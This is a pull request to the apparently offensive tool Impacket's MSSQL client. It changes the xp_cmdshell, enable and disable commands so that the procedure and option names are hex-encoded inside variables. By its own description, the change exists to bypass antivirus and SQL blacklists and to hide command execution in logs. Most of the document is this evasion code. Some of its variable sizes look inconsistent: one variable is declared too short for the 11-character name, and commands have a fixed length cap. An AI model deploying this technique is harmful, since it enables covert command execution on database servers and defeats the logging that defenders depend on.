### PR TITLE
Hex Encoded xp_cmdshell (aka HexP_cmdshell)

### DIFF
--- a/examples/mssqlclient.py
+++ b/examples/mssqlclient.py
@@ -137,7 +137,7 @@ if __name__ == '__main__':
 
         def do_xp_cmdshell(self, s):
             try:
-                self.sql_query("exec master..xp_cmdshell '%s'" % s)
+                self.sql.sql_query("DECLARE @x char(11); SET @x=0x78705f636d647368656c6c" + "; DECLARE @z char(184); SET @z=0x" + s.encode('utf-8').hex() + ";EXEC @x " + "@z")
                 self.sql.printReplies()
                 self.sql.colMeta[0]['TypeData'] = 80*2
                 self.sql.printRows()
@@ -167,8 +167,7 @@ if __name__ == '__main__':
 
         def do_enable_xp_cmdshell(self, line):
             try:
-                self.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
-                                   "exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
+                self.sql.sql_query("DECLARE @d char(9); SET @d=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @d, 1; RECONFIGURE; DECLARE @x char(9); SET @x=0x78705f636d647368656c6c; EXEC sp_configure @x, 1; RECONFIGURE;")
                 self.sql.printReplies()
                 self.sql.printRows()
             except:
@@ -176,8 +175,7 @@ if __name__ == '__main__':
 
         def do_disable_xp_cmdshell(self, line):
             try:
-                self.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure "
-                               "'show advanced options', 0 ;RECONFIGURE;")
+                self.sql.sql_query("DECLARE @r char(11); SET @r=0x78705f636d647368656c6c; EXEC sp_configure @r, 0; RECONFIGURE; DECLARE @b char(9); SET @b=0x73686f7720616476616e636564206f7074696f6e73; EXEC sp_configure @b, 0; RECONFIGURE;")
                 self.sql.printReplies()
                 self.sql.printRows()
             except:


### PR DESCRIPTION
(original PR : https://github.com/fortra/impacket/pull/1313)

Hex encoded version of xp_cmdshell to bypass AV/SQL query blacklisting and hide code execution in logs.

Notable mention:
@danielprintke - assisted with getting a working version of this code.